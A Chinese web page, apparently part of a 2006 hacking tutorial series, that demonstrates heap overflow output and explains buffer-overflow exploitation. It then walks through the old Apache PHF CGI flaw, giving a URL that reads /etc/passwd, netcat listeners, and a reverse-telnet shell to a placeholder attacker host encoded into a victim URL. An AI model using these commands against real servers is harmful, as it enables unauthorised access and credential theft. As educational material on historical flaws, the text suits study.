WEB开发网
开发学院网络安全黑客技术 战术攻防思维撷粹(2) 阅读

战术攻防思维撷粹(2)

 2006-07-04 20:29:23 来源:WEB开发网   
核心提示: 编译执行此代码:[root /w00w00/heap/examples/basic]# ./heap1 8buf1 = 0x804e000, buf2 = 0x804eff0, diff = 0xff0 bytesbefore overflow: buf2 = AAAAAAAAAAAAAA

编译执行此代码:

[root /w00w00/heap/examples/basic]# ./heap1 8
buf1 = 0x804e000, buf2 = 0x804eff0, diff = 0xff0 bytes
before overflow: buf2 = AAAAAAAAAAAAAAA
after overflow: buf2 = BBBBBBBBAAAAAAA

这里缓存1的溢出边界填充了缓存2,而由于缓存2的堆栈空间仍属于合法内存空间,因此程序不会崩溃。

缓冲区溢出条件发生在进程试图往缓冲区放入比分配的空间还要多的数据的时候,这可以导致段越界异常发生。攻击者可以精心设计,发送将溢出缓冲区并执行特定的命令代码。而程序发生溢出,可以改变函数的返回地址,以允许攻击者改变程序的执行流。而由于程序本身是以特权运行,于是执行的恶意代码也具有的特权模式,从而实现攻击。

产生这段执行程序代码根据系统的硬件体系结构不同而大相径庭,不过我们仍然可以借助一些自动工具产生称之为shellcode的特殊代码,比如本toolbox所包括的hellkit就是其中一个。

关于如何利用缓冲区溢出攻击的实现细节和详尽制作工序可以参阅“飞客杂志”第49期14小节(P49-14)和2个黑客论坛FAQ版区的基础讲座。

【知识应用组合攻击】

**PHF漏洞实验

著名的PHF漏洞相信很多人都应该知道。该漏洞是Apache服务器的一个CGI漏洞。该漏洞利用输入验证的不严格性,可以在输入字串中含有执行命令,从而逸出到可使用的shell。比如:/cig-bin/phf?Qalias=x%a/bin/cat%20/etc/passwd就可以查看服务器的帐户密码文件。

前面所叙述的shell回铲方式结合phf我们就可以完成一次简单的攻击:

<终端一>[attacker]#nc -l -n -v -p 80listening on [any] 80<终端二>[attacker]#nc -l -n -v -p 25listening on [any] 25<受害机器>#制造一个反向Telnet从而回铲shell的脚本/bin/telnet evil_hackers_ip 80 | /bin/sh | /bin/telnet evil_hackers_ip 25#其对应PHF语法如下(%a代表回车,%20代表空格)http://www.victim.com/cgi-bin/Qalias=x%a/bin/telnet%20evil_hackers_ip%2080%20|%20/bin/sh%20|%20/bin/telnet%20evil_hackers_ip%2025

上一页  2 3 4 5 6 7 8 9 10  下一页

Tags:战术 攻防 思维

编辑录入:爽爽 [复制链接] [打 印]
赞助商链接